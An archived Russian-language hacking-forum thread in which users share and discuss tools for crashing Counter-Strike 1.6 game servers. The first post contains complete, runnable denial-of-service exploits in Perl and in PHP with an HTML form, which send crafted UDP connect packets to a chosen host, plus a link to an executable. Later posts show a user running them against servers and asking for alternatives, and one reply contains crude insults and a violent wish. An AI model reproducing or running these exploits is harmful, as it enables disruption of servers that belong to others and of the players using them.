ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ОФФТОП_OLD > Болталка
Перезагрузить страницу Завалить локальный сервак Cs
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2008, 23:56
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию
да ссори оказывается есть)))
exe _http://rapidshare.com/files/35155810/CSHack.exe

на перле:

Код:
#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
и на пхп
Код:
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td>&nbsp;</td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td>&nbsp;</td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table> 
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>

<?php

/*
CS-dos exploit made by gemaglabin 
Bug was discovered by .FUF # 111596 
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server  ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/

ini_set("display_errors","0");

function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}

function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}

function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}

function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}

function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else 
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}

IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>
 

  #2  
Старый 15.03.2008, 15:14
InfernoNet
Banned
Регистрация: 07.11.2007
Сообщений: 301
Провел на форуме:
3428344

Репутация: 595
По умолчанию
А какой пароль то вводить надо?
Мне все время выдает:
Цитата:
Not done! Please, check IP address and port or password!
И где можно скачать сам perl для запуска скрипта на перле?
Последний раз редактировалось InfernoNet; 15.03.2008 в 15:21..
 

  #3  
Старый 15.03.2008, 15:59
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674

Репутация: 171


По умолчанию
пароль игрока на подключение там по-идее
пробуй этот http://milw0rm.org/exploits/4856
 

  #4  
Старый 15.03.2008, 16:20
InfernoNet
Banned
Регистрация: 07.11.2007
Сообщений: 301
Провел на форуме:
3428344

Репутация: 595
По умолчанию
Цитата:
Сообщение от Pernat1y  
пароль игрока на подключение там по-идее
пробуй этот http://milw0rm.org/exploits/4856
При нажатие на кнопку "Run" перекидывает на главную стр.
 

  #5  
Старый 16.03.2008, 00:35
InfernoNet
Banned
Регистрация: 07.11.2007
Сообщений: 301
Провел на форуме:
3428344

Репутация: 595
По умолчанию
Со всем разобрался.
Вопрос таков.
Несколько серваков падать не хотят, есть другие варианты?
 

  #6  
Старый 16.03.2008, 01:25
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме:
1180139

Репутация: 78
По умолчанию
Цитата:
Сообщение от InfernoNet  
Со всем разобрался.
Вопрос таков.
Несколько серваков падать не хотят, есть другие варианты?
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
 

  #7  
Старый 16.03.2008, 01:44
Pentrix
Новичок
Регистрация: 10.03.2008
Сообщений: 2
Провел на форуме:
18931

Репутация: 5
По умолчанию
Цитата:
Сообщение от goodkit  
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
Единственная умная фраза на весь топик)
А автор - клоун. Юзай гугл.
 

  #8  
Старый 16.03.2008, 11:27
InfernoNet
Banned
Регистрация: 07.11.2007
Сообщений: 301
Провел на форуме:
3428344

Репутация: 595
По умолчанию
Цитата:
Сообщение от goodkit  
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
Убейся, я в кс редко играю. В основном в War Craft.
А если в CS, то в source.
А валить серваки просто интересно. Так что автар - из тебя Ванга, как из Ванги строитель.

Цитата:
Сообщение от Pentrix  
А автор - клоун. Юзай гугл.
Если я клоун, то ты шарик от носа клоуна.
 

  #9  
Старый 16.03.2008, 11:30
InfernoNet
Banned
Регистрация: 07.11.2007
Сообщений: 301
Провел на форуме:
3428344

Репутация: 595
По умолчанию
Собственно по теме:
Проюзал скрипты и прогу.
Какие то серваки падают, а какие-то нет. Нужены еще варианты.
 

  #10  
Старый 16.03.2008, 11:58
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072

Репутация: 362
По умолчанию
на каких то серваках дыры есть, на каких то их закрывают, прикинь?
гугли тулзу универсальный хек, она тебе поможет повалить всё что хочешь.
недавно включили в неё удобную валилку кс-серваков. на ней ешё и бобла приподнять немного можно
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ